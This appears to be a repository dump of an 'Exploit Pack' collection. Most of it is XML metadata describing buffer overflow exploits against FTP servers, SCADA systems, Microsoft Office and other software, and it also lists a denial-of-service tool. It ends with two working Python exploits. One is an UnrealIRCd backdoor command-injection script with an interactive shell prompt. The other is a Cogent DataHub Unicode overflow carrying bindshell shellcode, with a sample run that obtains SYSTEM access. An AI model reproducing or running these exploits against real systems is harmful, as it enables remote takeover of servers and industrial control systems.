8 | A boundary error in the Unite Host Router service (UniteHostRouter.exe)
9 | when processing certain requests can be exploited to cause a stack-based buffer
10 | overflow via an overly long string in the "To:" field sent to UDP port 3217.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Aviosoft-Digital.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Aviosoft 1.x Win 7 and XP SP2/SP3 English Buffer Overflow Stack Overflow
9 | ToDo: Add Remote
10 | ToDo: Test Vulnerable Targets
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Avira-Guard.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Avira AntiVir personal edition avguard.exe 7.00.00.52 is prone to a local heap overflow because it fails to perform adequate boundary-checks.
9 | Successfully exploiting will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/BIG-Ant-Server-XPLT.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | BigAnt Server version 2.50 SEH Overwrite - 0day remote buffer overflow exploit suffer because it fails to perform adequate boundary-checks.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/BIG-Ant-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | BigAnt Server 2.52 remote buffer overflow exploit suffer because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Bison-FTP-Server-MKD.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | BisonFTP Server v3.5(MKD) Remote Buffer Overflow Exploit Newer version's not tested, maybe vulnerable too
10 | This FTP Server is prone to a remote buffer overflow attack.
11 | Impact : Remote Buffer Overflow ( in MKD command)
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Bison-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | BisonFTP Server v3.5 Remote Buffer Overflow Exploit Newer version's not tested, maybe vulnerable too
10 | ToDo: Add execute shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Bopup-Com-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH) fails to perform adequate boundary-checks.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/CA-ArcServe.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | CA ArcServe is prone to a remote buffer overflow because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Cerberus-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | Cerberus FTP Server 4.0.9.8 (REST) Remote Buffer Overflow Exploit Newer version's not tested, maybe vulnerable too
10 | ToDo: Add remote shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/CoDeSyS-SCADA-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | CoDeSyS SCADA Exploit. Vulnerability occurs while parsing long HTTP requests in webserver.
9 |
10 |
11 |
12 | Microsoft Windows SP0/SP1 En
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Cogent-Datahub.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Cogent Datahub v7.1.1.63 Remote Unicode Buffer Overflow Exploit
9 | ToDo: Add remote shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Windows XP SP2 , SP3 - Cogent Datahub v7.1.1.63
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Core-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | The vulnerability can be triggered by convincing a user to submit an overly long String for the SSH password. The buffer is unchecked,
9 | resulting in control of the instruction pointer, allowing for arbitrary code injection.
10 |
11 |
12 |
13 | Microsoft Windows XP SP3 - SP2 - SP1
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Denial-Of-Service.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | This Denial Of Service tool uses raw IP packets in no-novel ways to try stress the web target hosts childs
9 | It was designed to rapidly scan create 48 connections and it works fine against single hosts
10 | Required 2MB ADSL/Cable Bandwith in order to work properly
11 |
12 |
13 |
14 | Targets tested vulnerables Apache 2.x default config
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Disk-Pulse-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A vulnerability exists in the way Disk Pulse Server v2.2.34 process a remote clients "GetServerInfo" request.
9 | The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited
10 | to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/EChat-Server-v2.5.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Easy-FTP-Server-1.7.11.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | Easy FTP Server USER Command Remote Buffer Overflow Exploit
10 | when parsing the command 'USR', which leads to a stack based overflow. Easy FTP Server allow remote anonymous login by default
11 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Example.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Exploit information example
9 |
10 |
11 |
12 | Vulnerable targets
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/FTP-Getter.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | There was an error when sending a response to the PASV command. Fortunately, these errors lead to buffer overflows.
9 | This exploit is unstable. It should only be used as a POC. Tested several times on various systems, the buffer sometimes changed.
10 |
11 |
12 |
13 | Windows XP SP2 , SP3
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Free-Float-FTP-ACCL.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Free Float FTP Server ACCL Command Remote Buffer Overflow Exploit
9 | ToDo: Add execute shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Microsoft Windows XP SP2 - Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Free-Float-FTP-REST.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Free Float FTP Server ACCL Command Remote Buffer Overflow Exploit
9 | ToDo: Add remote shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Microsoft Windows XP SP2 - Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Free-Float-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Free Float FTP Server USER Command Remote Buffer Overflow Exploit
9 | when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default
10 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
11 |
12 |
13 |
14 | Microsoft Windows XP SP2 - Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/GOM-Player.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | There was an error when sending a response from the m3u player list. Fortunately, these errors lead to buffer overflows.
9 | This exploit is unstable. It should only be used as a POC. Once the list is imported the player will execute the BoF
10 |
11 |
12 |
13 | Windows XP SP2 , SP3
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/IBM-Tivoli-Storage.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A vulnerability exists in the way IBM Tivoli Storage Manager Express 5.3 CAD Service Buffer Overflow process a clients request.
9 | The vulnerability is caused due to a boundary error in when handling network messages and can be exploited
10 | to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 1581.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - Win2k
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/KingView-Scada.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in KingView 6.5.3 SCADA HMI allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/KnFTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | This exploit overwrite EIP and SEH is overwritten with larger payloads knftpd.exe is the only non safeseh module
10 | ToDo: Add remote shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Not tested Yet
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Kolibri-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Kolibri v2.0 is vulnerable to a remote buffer overflow attack. By sending a malformed HEAD request,
9 | we are able to overwrite both the return address and an SEH handler. Null bytes terminate the request though,
10 | but we are able to partially overwrite with a pointer to a POP + POP + RET instruction inside kolibri.exe and gain control.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/LDAP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
9 | ToDo: Add execute shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Linux Ubuntu 8.10
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/LDAP-Vault.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | There was an error when sending a a long value on SidVault 2.0e these errors lead to a buffer overflow.
9 | This exploit is unstable. It should only be used as a POC.
10 | Remote shell is available but the system will be unstable.
11 |
12 |
13 |
14 | Windows XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Microsoft-Excel-Record.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Microsoft Excel is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context
9 | of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.
10 | This version add support for Microsoft Office 2007 SP2.
11 |
12 |
13 |
14 | Windows XP SP2, SP3, Microsoft Office 2003 - 2007
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Microsoft-Visio.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Drawing Exchange Format (DXF) is a kind of data file format for CAD which is designed by Autodesk for cooperation between Autocad and other software.
9 | Varius software supports dxf file and Microsoft Visio is one of them.
10 | Dxf file contain some section which every section contain some records.
11 |
12 |
13 |
14 | Tested on Microsoft Office Visio 2002 (xp) in Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Microsoft-Word-Record.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Microsoft Word is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context
9 | of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.
10 | This update adds support for Office 2003 SP0.
11 |
12 |
13 |
14 | Windows XP SP2, SP3, Microsoft Office 2003
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Quick-Player.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Quick Player is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context
9 | of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.
10 | This version affects Quick Player 2.3.x
11 |
12 |
13 |
14 | Windows XP SP2, SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Remote-Scanner.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Port Scanner uses raw IP packets in novel ways to determine what hosts are available on the network
9 | It was designed to rapidly scan large networks, but works fine against single hosts
10 | Required argument "Target Host" or IP address.
11 |
12 |
13 |
14 | Targets vulnerables
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/SAP-Server-MaxDB.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Sap Server 7.7.06.09 is vulnerable to a remote buffer overflow attack. This vulnerability allows remote attackers to execute arbitrary
9 | code on vulnerable installations of SAP MaxDB. Authentication is not required to exploit this vulnerability.
10 | The specific flaw exists within the serv.exe process which listens by default on TCP port 7210.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/SDP-Downloader.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | SDP Download from http://sdp.ppona.com/ suffer a Remote Buffer Overflow
10 | because it fails while receinv Content-Type: video plus a long name this issue will allow an attacker to execute arbitrary code.
11 | Failed exploit attempts will result in a denial-of-service condition.
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Savant-Web-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Savant Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Script-FTP-3.3.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | ScriptFTP 3.3 Remote Buffer Overflow (LIST)
10 | ToDo: Add code execution shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Not tested Yet
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Simple-HTTPD.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | Remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
10 | ToDo: Add execute shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Not tested Yet - Linux 2.6.18-ubi-sys-V2.0.17
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Solar-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in Solar FTP 2.1.1 PASV for Windows allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Sysax-multi.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A boundary error in the SYSAX multi server 5.50 Create Folder Buffer Overflow
9 | Date Discovered: January 13, 2012
10 | Vendor Response: January 16, 2012
11 | Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
12 |
13 |
14 |
15 | Windows 7, XP SP2 , SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/TFTP-Server-1.4ST.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in TFTP Server SP 1.4 for Windows allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/UPlus-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | UPlus FTP server 1.7 is prone to a buffer overflow that allows remote attackers to cause a DoS or
9 | execute arbitrary code via a long username or password in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Verm-FTP-Daemon.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in Vermillion FTP Deamon 1.31 for Windows allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Windows-Movie-Maker.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | The vulnerable part starts at “IsValidWMToolsStream” function. In this function new is used two times for allocating space.
9 | In both cases, values of Size needed for allocating memory is read from .mswmm file.
10 | Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions or execute arbitrary code.
11 |
12 |
13 |
14 | Windows XP SP2,SP3 Windows Movie Maker 2.1, Windows Vista SP1,SP2 and x64 versions, Windows Movie Maker 2.6, Windows Movie Maker 6.0, Windows Movie Maker 6.1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/XM-Personal-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | XM FTP Server Command Remote Buffer Overflow Exploit
10 | when parsing the command 'USR/PASS', which leads to a stack based overflow. FTP Server allow remote anonymous login by default
11 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/XlightFTP-Server-v3.7.0.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | XlightFTP Server v3.7.0 Remote Root BOF Exploit
10 | when parsing the command connect, leads to a stack based overflow. Xlight FTP Server 3.7.0 allow remote anonymous login by default
11 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
12 |
13 |
14 |
15 | Microsoft Windows XP SP3 (Fr)
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/YourPersonalWebServer.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
9 | ToDo: Add Reverse
10 | ToDo: Test Vulnerable Targets
11 |
12 |
13 |
14 | Linux Ubuntu 6.06
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ABunreal.py:
--------------------------------------------------------------------------------
1 |
2 | #It seems as if our backdoor was found so we figured we cant sell this in the ac1db1tch3z
3 | #CANVAS pack (PhosphoricAc1d Exploit pack).
4 |
5 | #P.S. Since it took months and months for the community to find the system() exploit,
6 | #we still have a more complicated zerday unrealircd hack module. Please inquire
7 | #when our website is finished.
8 |
9 | #Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD,
10 | #and still owning everyone with it. Thanks.
11 | #------------------------------------------------------------------------
12 |
13 | #$ stat ABunreal.py
14 | # File: `ABunreal.py'
15 | # Size: 830 Blocks: 8 IO Block: 4096 regular file
16 | #Device: fd02h/64770d Inode: 16891994 Links: 1
17 | #Access: (0777/-rwxrwxrwx) Uid: ( 1003/ ag) Gid: ( 1010/ ag)
18 | #Access: 2010-04-05 14:26:14.000000000 -0400
19 | #Modify: 2009-11-10 00:04:33.000000000 -0500
20 | #Change: 2010-04-05 14:26:59.000000000 -0400
21 |
22 | #------------------------------------------------------------------------
23 |
24 | #!/usr/bin/env python
25 | # Ac1db1tch3z 09
26 |
27 | import sys
28 | import socket
29 | import struct
30 |
31 | def injectcode(host, port, command):
32 |
33 | host1 = host
34 | port1 = int(port)
35 | cmd = calc.exe
36 |
37 | print "!#@#@! Ac1db1tch3z is just Unreal #@!#%%\n"
38 | print "- Attacking %s on port %d"%(host1,port1)
39 | print "- sending command: %s"%cmd
40 |
41 | packet = "AB" +";"+ cmd + ";"+"\n"
42 |
43 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
44 | try:
45 | s.connect((host1, port1))
46 | except socket.error:
47 | print "No connection..."
48 | return 0
49 | s.sendall(packet)
50 | blah = s.recv(5000)
51 | print blah
52 | s.close()
53 |
54 | if __name__ == "__main__":
55 | if len(sys.argv) == 1:
56 | print "Usage:", sys.argv[0], " "
57 | print
58 | print "Modified for winAUTOPWN by QUAKERDOOMER"
59 | print
60 | sys.exit(1)
61 | else:
62 | print "Type quit to EXIT the shell\n"
63 | while sys.argv[2] >= 1:
64 | cmd = raw_input("CMD:$Sa$ => ")
65 | if cmd == "quit":
66 | sys.exit(0)
67 | injectcode(sys.argv[1],sys.argv[2],cmd)
68 |
69 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/Cogent-datahub.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #
3 | # Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit
4 | # tested on:
5 | # - windows server 2003
6 | # - windows XP sp3
7 | # questions >> @net__ninja || @luigi_auriemma
8 | # example usage:
9 | # [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
10 | #
11 | # -----------------------------------------------------
12 | # ------ Cogent Datahub Unicode Overflow Exploit ------
13 | # ------------- Found by Luigi Auriemma ---------------
14 | # --------- SYSTEM exploit by Steven Seeley -----------
15 | #
16 | # (+) Sending overflow...
17 | # (+) Getting shell..
18 | # Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
19 | # Microsoft Windows [Version 5.2.3790]
20 | # (C) Copyright 1985-2003 Microsoft Corp.
21 | #
22 | # C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
23 | # whoami
24 | # nt authority\system
25 | #
26 | # C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>
27 |
28 | import socket,time,sys,os
29 |
30 | # bindshell on port 1337
31 | shellcodez = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
32 | "IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
33 | "111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
34 | "2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
35 | "04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
36 | "PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
37 | "M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
38 | "XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
39 | "6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
40 | "8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
41 | "PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
42 | "0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
43 | "XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
44 | "8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
45 | "O8VKO8PKZA")
46 |
47 | align= ""
48 | align += "\x54" # push esp
49 | align += "\x6f"
50 | align += "\x58" # pop eax
51 | align += "\x6f"
52 | align += "\x05\x6f\x11" # add eax,11006f00
53 | align += "\x6f"
54 | align += "\x2d\x37\x01" # sub eax,01003700
55 | align += "\x6f"
56 | align += "\x2d\x37\x10" # sub eax,11003700
57 | align += "\x6f"
58 | align += "\x50" # push eax
59 | align += "\x6f"
60 | align += "\x48" # dec eax
61 | align += "\x6f"
62 | align += "\x48" # dec eax
63 | align += "\x6f"
64 | align += "\x55" # push ebp
65 | align += "\x6f"
66 | align += "\x59" # pop ecx
67 | align += "\x08" # add [eax],cl (carve a 'RETN' onto the stack)
68 | align += "\x6f"
69 | align += "\x40" # inc eax
70 | align += "\x6f"
71 | align += "\x40" # inc eax
72 | align += "\x6f\x41" * (48) # inc ecx (will not effect to our payload)
73 | align += "\x6f"
74 | align += "\x62" # becomes our carved RETN on the stack (0x61+0x62=0xc3)
75 |
76 | request = "(domain \""
77 | request += "\x61" * 1019
78 | request += "\x7f\x55" # jmp esp 0x0055007f
79 | request += align
80 | request += shellcodez
81 | request += "\")\r\n"
82 |
83 | def banner():
84 | banner = "\n-----------------------------------------------------\n"
85 | banner += "------ Cogent Datahub Unicode Overflow Exploit ------\n"
86 | banner += "------------- Found by Luigi Auriemma ---------------\n"
87 | banner += "--------- SYSTEM exploit by Steven Seeley -----------\n"
88 | return banner
89 |
90 | if len(sys.argv) < 2:
91 | print banner()
92 | print "(-) Usage: %s " % sys.argv[0]
93 | sys.exit(0)
94 |
95 | target = sys.argv[1]
96 | print banner()
97 |
98 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
99 | try:
100 | s.connect((target,4502))
101 | except:
102 | print "[-] Connection to %s failed! % (target)"
103 | sys.exit(0)
104 |
105 | print "(+) Sending overflow..."
106 | s.send(request)
107 | s.recv(1024)
108 | # wait for the target, sheesh.
109 | time.sleep(2)
110 | print "(+) Getting shell.."
111 | s.close()
112 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/DenialOfService80.py:
--------------------------------------------------------------------------------
